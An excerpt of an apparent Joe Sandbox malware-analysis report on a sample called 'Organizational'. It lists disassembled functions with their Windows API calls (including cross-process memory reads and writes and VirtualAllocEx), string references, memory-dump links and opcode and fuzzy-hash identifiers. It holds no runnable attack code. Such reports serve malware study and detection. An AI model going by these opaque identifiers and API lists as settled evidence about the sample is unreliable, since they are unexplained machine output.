                                                    • Instruction Fuzzy Hash: 4601B1B3B021057BE22466119C82FFB7B6CAA61794F044035FE0697742F7A6DE11B2E6
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00F55075
                                                    • __beginthreadex.LIBCMT ref: 00F55093
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00F550A8
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F550BE
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F550C5
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                    • String ID:
                                                    • API String ID: 3824534824-0
                                                    • Opcode ID: 27f3107532743d76c62b90a5b809cdcdd2be30903fa2096e27253827a8157551
                                                    • Instruction ID: eb21fa0a19c230b545a2ea6a6d3a51b94c720b55bf0ee0488cde1a12b29e467f
                                                    • Opcode Fuzzy Hash: 27f3107532743d76c62b90a5b809cdcdd2be30903fa2096e27253827a8157551
                                                    • Instruction Fuzzy Hash: 3911257690870CABC7009BA89C48AEB7BACAB85721F140255FD14D3390D6718908ABE0
                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F48E3C
                                                    • GetLastError.KERNEL32(?,00F48900,?,?,?), ref: 00F48E46
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00F48900,?,?,?), ref: 00F48E55
                                                    • HeapAlloc.KERNEL32(00000000,?,00F48900,?,?,?), ref: 00F48E5C
                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F48E73
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 842720411-0
                                                    • Opcode ID: 1916eeb4dfe8b5d8ae58d0aa2312d135a48e6853208856952258de09caba6b2c
                                                    • Instruction ID: 34a12c62e0520a7b23dfe937f90792a1cd70f2f90751e8b4b89843c17e63ebfb
                                                    • Opcode Fuzzy Hash: 1916eeb4dfe8b5d8ae58d0aa2312d135a48e6853208856952258de09caba6b2c
                                                    • Instruction Fuzzy Hash: F701FB71601208AFDB205FA5DC88DAB7FADEF897A5B500569F849C3220DE319C15EB70
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F5581B
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F55829
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F55831
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00F5583B
                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F55877
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: 25ec003777bad5ef197b8ba686b71ba771790734c0c8609ed081cfac2a594d6f
                                                    • Instruction ID: 97cc775f961e7a920beaaadb4ea300b882fdc7f0623f8ca1ec41f8fe68b4f7c8
                                                    • Opcode Fuzzy Hash: 25ec003777bad5ef197b8ba686b71ba771790734c0c8609ed081cfac2a594d6f
                                                    • Instruction Fuzzy Hash: D9015B31C01A1D9BCF009FE4D859AEDBBB8BB08B22F404156EA01B2140CB319558EBA1
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F48CDE
                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F48CE8
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F48CF7
                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F48CFE
                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F48D14
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 945335ea5e79c51cf70a16b24b929b278449471a14b444e71c253070aa9e198d
                                                    • Instruction ID: 32fd78e05c967b170dfc57e6d79e8960340667bde5a0abaf9d515e679ad2da1b
                                                    • Opcode Fuzzy Hash: 945335ea5e79c51cf70a16b24b929b278449471a14b444e71c253070aa9e198d
                                                    • Instruction Fuzzy Hash: EEF08C31601208AFEB500FE49C8CEBB3FACEF497A4B504025F90482190DE609C05FB60
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F48D3F
                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D49
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D58
                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D5F
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F48D75
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 9229da6349772c916102745226ce6c4c140e9e96f608bbfbd8080f29b4d82e40
                                                    • Instruction ID: 4ead693ba0b916a9f57b7e0d75f7b343daf7476836034f6c820bec3a7b4397e8
                                                    • Opcode Fuzzy Hash: 9229da6349772c916102745226ce6c4c140e9e96f608bbfbd8080f29b4d82e40
                                                    • Instruction Fuzzy Hash: C3F08C31601208AFEB510FA4EC88FBB3BACEF497A4F440115F95482290DE609D05FB60
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00F4CD90
                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F4CDA7
                                                    • MessageBeep.USER32(00000000), ref: 00F4CDBF
                                                    • KillTimer.USER32(?,0000040A), ref: 00F4CDDB
                                                    • EndDialog.USER32(?,00000001), ref: 00F4CDF5
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 7c54886649d0b6d18fdceeef8c2c0ebb95d1bc82cec4f504cf88a2fa809acab3
                                                    • Instruction ID: 267d4d6f95a97aad2339b2faad91979facb46355655bfb26f5554a589c50dfea
                                                    • Opcode Fuzzy Hash: 7c54886649d0b6d18fdceeef8c2c0ebb95d1bc82cec4f504cf88a2fa809acab3
                                                    • Instruction Fuzzy Hash: 88018B31901708ABEB615B50DD4EBE67F78FF00715F400669F592A10D1EFF4A958ABC0
                                                    APIs
                                                    • EndPath.GDI32(?), ref: 00EF179B
                                                    • StrokeAndFillPath.GDI32(?,?,00F2BBC9,00000000,?), ref: 00EF17B7
                                                    • SelectObject.GDI32(?,00000000), ref: 00EF17CA
                                                    • DeleteObject.GDI32 ref: 00EF17DD
                                                    • StrokePath.GDI32(?), ref: 00EF17F8
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: a314fb484cddff6646da219c31c7ff14b80cc0ffaeeb686dbaa12dcd63dd8def
                                                    • Instruction ID: 8690b59c6a0c0ab2786bcb2572e1eea2cb77b68449ac16e47b9bbbfde96771d9
                                                    • Opcode Fuzzy Hash: a314fb484cddff6646da219c31c7ff14b80cc0ffaeeb686dbaa12dcd63dd8def
                                                    • Instruction Fuzzy Hash: 44F0193000874CEBDB556F25EC8C7AA3BA4AB41326F648355E92D641F0CB30C999FF50
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 00F5CA75
                                                    • CoCreateInstance.OLE32(00F83D3C,00000000,00000001,00F83BAC,?), ref: 00F5CA8D
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    • CoUninitialize.OLE32 ref: 00F5CCFA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                    • String ID: .lnk
                                                    • API String ID: 2683427295-24824748
                                                    • Opcode ID: 699361e913946ccfa9645b68cd6fd8540da6618e95e245501bbf86ef66b0e9ef
                                                    • Instruction ID: 8c494ded164f9939fbb9599f3695955f7b5eb2c8bbf3474868fe183936ab3047
                                                    • Opcode Fuzzy Hash: 699361e913946ccfa9645b68cd6fd8540da6618e95e245501bbf86ef66b0e9ef
                                                    • Instruction Fuzzy Hash: C0A10BB1104205AFD300EF64CC91EABB7E8EF94714F40491DF656972E2EB71EA49CB92
                                                    APIs
                                                      • Part of subcall function 00F10FE6: std::exception::exception.LIBCMT ref: 00F1101C
                                                      • Part of subcall function 00F10FE6: __CxxThrowException@8.LIBCMT ref: 00F11031
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F01680: _memmove.LIBCMT ref: 00F016DB
                                                    • __swprintf.LIBCMT ref: 00EFE598
                                                    Strings
                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EFE431
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                    • API String ID: 1943609520-557222456
                                                    • Opcode ID: 6bafadca70546116dabdc0d885c43c1ac0d0e0b620acfdf5f734b214f77a4c16
                                                    • Instruction ID: 5c9e48abfff88132eb1d1fc341b3b09b955c5506b50d2a0358a4abd979217b8a
                                                    • Opcode Fuzzy Hash: 6bafadca70546116dabdc0d885c43c1ac0d0e0b620acfdf5f734b214f77a4c16
                                                    • Instruction Fuzzy Hash: B8919E715082059FC724EF24CC86CBEB7A8FF95714F40491DF586A72A1EB24EE44EB92
                                                    APIs
                                                    • __startOneArgErrorHandling.LIBCMT ref: 00F152CD
                                                      • Part of subcall function 00F20320: __87except.LIBCMT ref: 00F2035B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorHandling__87except__start
                                                    • String ID: pow
                                                    • API String ID: 2905807303-2276729525
                                                    • Opcode ID: 05cb34b05fbb0c6b8032a711cfbdcec032caf15f0d97e39277277c858b3604e2
                                                    • Instruction ID: 34516ec6115f5241e0f71d71e0c2ec6db0d6207776f5c25de8a6204e9f94a8c7
                                                    • Opcode Fuzzy Hash: 05cb34b05fbb0c6b8032a711cfbdcec032caf15f0d97e39277277c858b3604e2
                                                    • Instruction Fuzzy Hash: 83515B63E09605D7CB11F714ED513FA7B909B80B60F308968E4D5862EAEF788CC5BB46
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #$+
                                                    • API String ID: 0-2552117581
                                                    • Opcode ID: 5793d6b1e0ec46a04acc800e97ef96e168600ba81d981220b2aefde8fd97be11
                                                    • Instruction ID: 334a0489c0fb063e1c8d48ca069dbb6a79d0d27a8e34f24976616172e761f648
                                                    • Opcode Fuzzy Hash: 5793d6b1e0ec46a04acc800e97ef96e168600ba81d981220b2aefde8fd97be11
                                                    • Instruction Fuzzy Hash: 7851E175904255CFDF259F68C880AFA7BA4BF5A320F144055EC91EB2D0DB74AC82EB62
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memset$_memmove
                                                    • String ID: ERCP
                                                    • API String ID: 2532777613-1384759551
                                                    • Opcode ID: 1a3a7286374954a65170422add628bea0b143b386b89d27fefeef52cc6fb8af1
                                                    • Instruction ID: 410db9dd00d237edd7adb50d1e7847c34622090c0e61d4786fc7fde30030f28a
                                                    • Opcode Fuzzy Hash: 1a3a7286374954a65170422add628bea0b143b386b89d27fefeef52cc6fb8af1
                                                    • Instruction Fuzzy Hash: D151B4B1E007099BDB34CF64C8817AABBE4EF04324F14856EE84ADB291E774D585EB90
                                                    APIs
                                                      • Part of subcall function 00F51CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F49E4E,?,?,00000034,00000800,?,00000034), ref: 00F51CE5
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F4A3F7
                                                      • Part of subcall function 00F51C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F49E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00F51CB0
                                                      • Part of subcall function 00F51BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00F51C08
                                                      • Part of subcall function 00F51BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F49E12,00000034,?,?,00001004,00000000,00000000), ref: 00F51C18
                                                      • Part of subcall function 00F51BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F49E12,00000034,?,?,00001004,00000000,00000000), ref: 00F51C2E
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F4A464
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F4A4B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @
                                                    • API String ID: 4150878124-2766056989
                                                    • Opcode ID: 4543784cf0f26cbf2310aa53bc3955e08ded21ad26d5173bfa5eae041943c1fc
                                                    • Instruction ID: 757a7bd17995c2bfb19bd79728db02f1f3fef4bf1131ea02512b41820905e1c3
                                                    • Opcode Fuzzy Hash: 4543784cf0f26cbf2310aa53bc3955e08ded21ad26d5173bfa5eae041943c1fc
                                                    • Instruction Fuzzy Hash: 82416D7294021CBFCB20DBA4CC85BEEBBB8EF45310F004095FA45B7190DA716E89DBA1
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F77A86
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F77A9A
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F77ABE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: b8c53bcb69de737fa6c6a54bf07877753fdb2f64ddbe5e8419e155add5cfbb1f
                                                    • Instruction ID: fc782c08c68c0f32e5699effd41f90fb69fe821b5418586587e3337f3c628a70
                                                    • Opcode Fuzzy Hash: b8c53bcb69de737fa6c6a54bf07877753fdb2f64ddbe5e8419e155add5cfbb1f
                                                    • Instruction Fuzzy Hash: 6A21D33265421CBFEF119F50CC42FEE3B69EF48724F114215FE186B190DA75A854AB90
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F7826F
                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F7827D
                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F78284
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 4014797782-2298589950
                                                    • Opcode ID: 4bb0999f16b18dc7e132e22818ec7370a96b6f974557a1263adcb22acaefb54c
                                                    • Instruction ID: 03b99bcb7f3dafcefa43cd0d718033fe9223f7a9cd40aa514923ef8766a40f71
                                                    • Opcode Fuzzy Hash: 4bb0999f16b18dc7e132e22818ec7370a96b6f974557a1263adcb22acaefb54c
                                                    • Instruction Fuzzy Hash: B6217FB5A04208AFDB00DF54CCC5DA737EDEB4A3A4B14415AFA059B251CB70EC12EBA1
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F77360
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F77370
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F77395
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
